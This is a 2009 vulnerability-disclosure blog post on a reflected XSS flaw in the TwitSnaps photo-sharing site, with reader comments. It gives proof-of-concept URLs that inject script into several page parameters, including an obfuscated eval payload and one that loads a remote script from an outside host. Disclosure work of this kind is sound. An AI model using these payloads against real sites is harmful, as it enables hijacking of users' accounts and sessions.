Sunday, July 5, 2009 MoTB #05: Reflected XSS in TwitSnaps What is TwitSnaps "We tweet your photos, that's what we do! You want to share your photographs on Twitter? TwitSnaps is at your service." (TwitSnaps about page) Twitter affect TwitSnaps can be used to send tweets by uploading new photos, or posting comments on existing photos. TwitSnaps is using Username/Password authentication in order to utilize the Twitter API. Popularity rate A competitor to TwitPic in the Twitter photo sharing market. Not a big competitor, though - 2.5 twits Vulnerability: Reflected Cross-Site in the Search page. Status: Patched. Details: The TwitSnaps page does not encode HTML entities in the "search" variable, which can allow the injection of scripts. This vulnerability could have allowed an attacker to send tweets on behalf of its victims. Proof-of-Concept: http://twitsnaps.com/search.php?searchfield=xxx%3C%2Ftitle%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E Vendor response rate Vulnerability was fixed 5 days after it has been reported. Additional information provider by people commenting states this is still vulnerable: Blogger d3v1l said... still vulnerable :) poc: http://twitsnaps.com/full_photo.php?img_id=XSS anyway,Keep up the good work Regards! Blogger Martin H said... d3v1l I couldn't get it to go through. Closest I could get was (my script was not actioned just broke out of the tags) http://twitsnaps.com/full_photo.php?img_id=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E My version on an easy xss is http://twitsnaps.com/full_photo.php?img_id=3270&act=%22%27%3E%3Cscript%3Eeval(String.fromCharCode(97%2C108%2C101%2C114%2C116%2C40%2C34%2C88%2C83%2C83%2C32%2C102%2C111%2C117%2C110%2C100%2C32%2C98%2C121%2C32%2C84%2C104%2C101%2C84%2C101%2C115%2C116%2C77%2C97%2C110%2C97%2C103%2C101%2C114%2C46%2C99%2C111%2C109%2C32%2C45%2C32%2C83%2C116%2C105%2C108%2C108%2C32%2C69%2C120%2C105%2C115%2C116%2C115%2C34%2C41%2C59))%3C%2Fscript%3E%3C!-- Anonymous Anonymous said... GET: http://twitsnaps.com/home.php?ob=%22%3E%3Cscript src%3d//ckers.org/s%3E%3C/script%3E July 6, 2009 7:35 PM